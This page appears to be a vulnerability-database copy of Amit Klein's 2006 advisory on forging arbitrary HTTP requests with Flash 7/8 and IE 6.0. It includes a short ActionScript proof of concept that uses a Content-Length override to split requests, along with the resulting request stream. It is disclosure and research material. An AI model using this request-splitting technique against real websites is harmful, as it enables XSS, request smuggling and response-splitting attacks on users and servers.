Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13913
HistoryAug 17, 2006 - 12:00 a.m.

Technical note by Amit Klein: "Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)"

2006-08-1700:00:00
vulners.com
15
JSON

Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)

         Amit Klein, August 2006

The trick

In [1], I showed how to forge parts of HTTP requests containing
CRs and LFs using Flash. In that write-up, the data was part of the
HTTP body section. However, combining the Content-Length overriding
trick from [2] enables a condition of HTTP request splitting (see [3]).

This enables almost complete control over the second HTTP request -
including methods. The only pre-requisite (apart from using IE 6.0 and
Flash 7/8) is that there's one resource in the target website that does
not terminate the TCP connection in response to a POST request.

Here's an example:

var req:XML=new XML("<foo>\r\nOPTIONS / HTTP/1.0\r\nHost:
www.target.site\r\n\r\n</foo>");
req.addRequestHeader("Content-Length","7");
req.send("http://www.target.site/path/to/script.cgi&quot;,&quot;_blank&quot;&#41;;

The request stream is:

POST /path/to/script.cgi HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.target.site
Connection: Keep-Alive
Cache-Control: no-cache

<foo>
OPTIONS / HTTP/1.0
Host: www.target.site

</foo>

Note that this works well in HTTP and HTTPS.

Also note that if the target web server is Apache 2.0 with mod_ssl,
then there's a need to modify the User-Agent header for IE, in order
for it not to include the string "MSIE". If the string "MSIE" is
found in the User-Agent header, mod_ssl will terminate the HTTPS
connection after the first request (see [5]). So this is as simple
as adding the following to the ActionScript code:

req.addRequestHeader("User-Agent","Hacker/1.0");

Some interesting consequences

  • Javascript scanning - now can use almost all HTTP methods (verbs)
    including WebDAV, full control over the headers, etc.

  • All the impact in [3] and [4] is relevant - XSS in some cases, HTTP
    request smugling and HTTP Response Splitting attacks (from the
    browser), etc.

References

[1] "Sending multipart/form-data requests from Flash (with arbitrary
headers)", Amit Klein, August 2006
http://www.securityfocus.com/archive/1/442820

[2] "Forging HTTP request headers with Flash", Amit Klein, July 2006
http://www.securityfocus.com/archive/1/441014

[3] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing,
and a lot more…", Amit Klein, September 2005
http://www.securityfocus.com/archive/1/411585

[4] "IE + some popular forward proxy servers = XSS, defacement (browser
cache poisoning)", Amit Klein, May 2006
http://www.securityfocus.com/archive/1/434931

[5] "mod_ssl F.A.Q." (mod_ssl website), under "When I connect via HTTPS
to an Apache+mod_ssl+OpenSSL server with Microsoft Internet Explorer
(MSIE) I get various I/O errors. What is the reason?"
http://www.modssl.org/docs/2.8/ssl_faq.html#ToC49

JSON